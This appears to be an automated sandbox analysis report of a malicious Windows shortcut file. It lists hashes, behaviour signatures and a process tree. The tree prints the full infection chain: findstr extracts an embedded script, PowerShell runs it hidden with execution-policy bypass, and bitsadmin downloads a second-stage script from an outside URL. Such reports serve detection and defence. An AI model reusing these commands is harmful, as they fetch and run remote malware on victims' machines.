Analysis
-
max time kernel
137s -
max time network
131s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
25-08-2024 19:01
Static task
static1
Behavioral task
behavioral1
Sample
pack-KRJ88981-99192.lnk
Resource
win7-20240708-en
General
-
Target
pack-KRJ88981-99192.lnk
-
Size
2KB
-
MD5
4163cb3655dfdae03d13d623dd9dc8db
-
SHA1
6183474325319e89dcf02e9bd54220d1d912638b
-
SHA256
0984a28618d50bee71deec7824b449bbe04b04b0951fe4d8dcf8a3ffa7691bb7
-
SHA512
b5205aa5686fed2f93edcd42729fad49572fe3424459d93c32139460bf3d06ee4d18d2391800965d97129e1f39c932409f1b58388bc70841624c4f11718c8a8d
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Download via BitsAdmin 1 TTPs 1 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 2992 powershell.exe 2992 powershell.exe 2992 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2992 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
cmd.execmd.execmd.exepowershell.execmd.exedescription pid process target process PID 1092 wrote to memory of 3140 1092 cmd.exe cmd.exe PID 1092 wrote to memory of 3140 1092 cmd.exe cmd.exe PID 3140 wrote to memory of 3664 3140 cmd.exe findstr.exe PID 3140 wrote to memory of 3664 3140 cmd.exe findstr.exe PID 3140 wrote to memory of 4868 3140 cmd.exe cmd.exe PID 3140 wrote to memory of 4868 3140 cmd.exe cmd.exe PID 4868 wrote to memory of 2992 4868 cmd.exe powershell.exe PID 4868 wrote to memory of 2992 4868 cmd.exe powershell.exe PID 2992 wrote to memory of 4896 2992 powershell.exe cmd.exe PID 2992 wrote to memory of 4896 2992 powershell.exe cmd.exe PID 4896 wrote to memory of 4212 4896 cmd.exe bitsadmin.exe PID 4896 wrote to memory of 4212 4896 cmd.exe bitsadmin.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\pack-KRJ88981-99192.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1092 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c findstr /s jhdfkweinwefa C:\Users\Admin\\*.lnk > C:\Users\Admin\\Documents\\blue.ps1 & cmd /c powershell -w hidden -ep bypass -File C:\Users\Admin\\Documents\\blue.ps12⤵
- Suspicious use of WriteProcessMemory
PID:3140 -
C:\Windows\system32\findstr.exefindstr /s jhdfkweinwefa C:\Users\Admin\\*.lnk3⤵PID:3664
-
C:\Windows\system32\cmd.execmd /c powershell -w hidden -ep bypass -File C:\Users\Admin\\Documents\\blue.ps13⤵
- Suspicious use of WriteProcessMemory
PID:4868 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -ep bypass -File C:\Users\Admin\\Documents\\blue.ps14⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2992 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /C echo 1 > C:\Users\Admin\AppData\Roaming\\d & bitsadmin /transfer jhdfkweinwefa /download /priority FOREGROUND "https://jotaortega.com/white/tino.ps1" C:\Users\Admin\AppData\Roaming\\mtAWXwsnpbHikP.ps1 & del C:\Users\Admin\AppData\Roaming\\d & exit5⤵
- Suspicious use of WriteProcessMemory
PID:4896 -
C:\Windows\system32\bitsadmin.exebitsadmin /transfer jhdfkweinwefa /download /priority FOREGROUND "https://jotaortega.com/white/tino.ps1" C:\Users\Admin\AppData\Roaming\\mtAWXwsnpbHikP.ps16⤵
- Download via BitsAdmin
PID:4212
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4152,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=4308 /prefetch:81⤵PID:224
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
941B
MD5367a305a4630d346d724dbb691efb600
SHA1d6c8eaad2c33dc6c1e6a78bcce5be7f1c6d31ecd
SHA256eb806b5998540137f2d368ba7bd613d5cadf65c683467c0be55f8f4c2cd3caea
SHA5129484ee11a52aa8f26c85e94ebd326a75df52d33186ecbcfa118895ec39b5a1a9ede48ddabdae830294596ee9bd4827bb56c04b01e54ae6dd341ed10db2b61b11